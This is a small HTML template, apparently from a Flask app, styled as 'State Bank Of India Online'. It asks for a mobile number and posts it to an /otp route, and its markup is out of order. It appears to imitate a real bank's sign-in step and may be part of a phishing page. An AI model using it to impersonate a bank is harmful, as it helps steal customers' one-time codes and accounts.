<!DOCTYPE html>
<html>
    <body></body>
    <header>
    <div class="logo">💰 State Bank Of India Online</div>
    <nav>
      <a href="#">Home</a>
      <a href="#">Products & Services</a>
      <a href="#">Help</a>
      <a href="#">Contact Us</a>
    </nav>
  </header>
<head>
    <title>Enter Mobile</title>
    <link rel="stylesheet" href="{{ url_for('static', filename='otp_style.css') }}">
</head>
<body>
    <div class="container">
        <h2>Enter Your Mobile Number</h2>
        <form action="/otp" method="POST">
            <input type="text" name="mobile" placeholder="Mobile Number" required>
            <button type="submit">Get OTP</button>
        </form>
    </div>
</body>
</html>
<script src="static/script.js"></script>